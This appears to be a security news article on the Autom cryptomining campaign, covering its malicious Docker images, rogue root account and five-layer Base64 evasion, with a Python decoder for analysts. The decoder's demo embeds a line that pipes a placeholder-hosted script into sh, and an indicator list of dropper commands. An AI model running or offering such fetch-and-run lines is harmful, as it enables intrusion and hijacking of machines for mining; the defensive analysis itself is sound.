
Autom Cryptomining malware attack using upgraded evasion strategies


New research published today shows that an ongoing cryptocurrency mining campaign has upgraded its arsenal, adding new defense evasion tactics that let the threat actors hide their intrusions and stay under the radar.

According to researchers from DevSecOps and cloud security company Aqua Security, who have been tracking the malware operation for the past three years, a total of 84 attacks on its honeypot servers have been recorded since the campaign was first discovered in 2019, four of which occurred in 2021. Separately, 125 attacks were discovered in the third quarter of 2021 alone, indicating that the attacks have not slowed down.

The initial attack involved executing malicious commands while running a vanilla image named “alpine:latest”, which resulted in the download of a shell script named “autom.sh”.

“Attackers usually use ordinary images and malicious commands to execute attacks, because most organizations trust official images and allow them to be used,” the researchers said in a report shared with The Hacker News. “Over the years, the malicious commands added to the official images to carry out the attacks have hardly changed. The main difference is the server from which the shell script autom.sh is downloaded.”


The shell script kicks off the attack sequence, enabling the attacker to create a new user account named “akay”, escalate its privileges to root, and use that account to run arbitrary commands on the infected machine in order to mine cryptocurrency.

Although the early stages of the 2019 campaign used no special techniques to hide the mining activity, later versions show the extreme measures its developers have taken to keep it from being detected and inspected: chiefly disabling security mechanisms and retrieving an obfuscated mining shell script that was Base64-encoded five times to get past security tools.
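As an added illustration of how a defender can handle the layered encoding described above (this is example code, not Aqua's or the attackers' code), the Python helper below peels nested Base64 layers from a captured script, reports how many layers it removed, and flags common dropper tokens; the embedded script, the `example.invalid` URL and the indicator list are constructed for the demo.

```python
import base64
import binascii
import re

# Constructed demo script, NOT the real autom.sh: it creates the "akay" user the
# article mentions and pipes a downloaded script into sh (placeholder URL).
INNER_SCRIPT = "#!/bin/sh\nuseradd -m akay\ncurl -s http://example.invalid/autom.sh | sh\n"

def wrap_base64(text: str, layers: int) -> str:
    """Wrap text in `layers` nested Base64 encodings (used only to build test input)."""
    data = text.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode()

# Five layers, mirroring the evasion described in the article.
SAMPLE = wrap_base64(INNER_SCRIPT, 5)

_B64_CHARS = re.compile(r"^[A-Za-z0-9+/=]+$")

def peel_base64(blob: str, max_layers: int = 10):
    """Strip nested Base64 layers; returns (layers_removed, decoded_text).
    Stops when the data is not valid Base64 or no longer decodes to text."""
    data, layers = blob.encode(), 0
    while layers < max_layers:
        try:
            compact = re.sub(r"\s+", "", data.decode("ascii"))
            if not _B64_CHARS.match(compact):
                break
            decoded = base64.b64decode(compact, validate=True)
            decoded.decode("utf-8")  # stop at binary payloads
        except (UnicodeDecodeError, binascii.Error):
            break
        data, layers = decoded, layers + 1
    return layers, data.decode("utf-8", errors="replace")

# Tokens common in miner droppers; tune the list for your environment.
INDICATORS = ("useradd", "curl", "wget", "| sh", "| bash", "nohup", "xmrig", "setenforce 0")

def analyze(blob: str) -> dict:
    """Decode layered Base64 and flag content that looks like a miner dropper."""
    layers, text = peel_base64(blob)
    hits = [tok for tok in INDICATORS if tok in text]
    # Two or more encoding layers is itself unusual for legitimate scripts.
    return {"layers": layers, "indicators": hits, "flagged": layers >= 2 or bool(hits)}

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

Feeding the decoded text to a YARA rule or a command-line allowlist check works the same way; the point is to inspect the innermost layer rather than the outer blob.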

Mining campaign

Malware campaigns that hijack computers to mine cryptocurrency have been dominated by multiple threat actors, such as Kinsing, which has been found scanning the Internet for misconfigured Docker servers in order to break into unprotected hosts and install a previously undocumented strain of coin miner.


On top of that, a hacking group called TeamTNT has been observed striking insecure Redis database servers, Alibaba Elastic Computing Service (ECS) instances, exposed Docker APIs, and vulnerable Kubernetes clusters to execute malicious code with root privileges on the targeted hosts and deploy cryptocurrency mining payloads and credential stealers. Stolen Docker Hub accounts have also been used to host malicious images, which are then used to distribute cryptocurrency miners.


In recent weeks, security flaws in the Log4j logging library, as well as newly discovered vulnerabilities in Atlassian Confluence, F5 BIG-IP, VMware vCenter, and Oracle WebLogic Server, have been abused to take over machines to mine cryptocurrency, a scheme known as cryptojacking. Earlier this month, network-attached storage (NAS) device maker QNAP warned that cryptocurrency mining malware targeting its devices could consume about 50% of total CPU usage.

“Miners are a low-risk way for cybercriminals to convert vulnerabilities into digital cash. The biggest risk to their cash flow is that competing miners find the same vulnerable server,” Sophos senior threat researcher Sean Gallagher noted in an analysis of the Tor2Mine mining campaign, which involved the use of PowerShell scripts to disable malware protection, execute the miner payload, and obtain Windows credentials.

“The Autom campaign shows that attackers are becoming more sophisticated, constantly improving their techniques and their ability to avoid detection by security solutions,” the researchers said. To guard against these threats, it is recommended to monitor suspicious container activity, perform dynamic image analysis, and regularly scan the environment for misconfigurations.
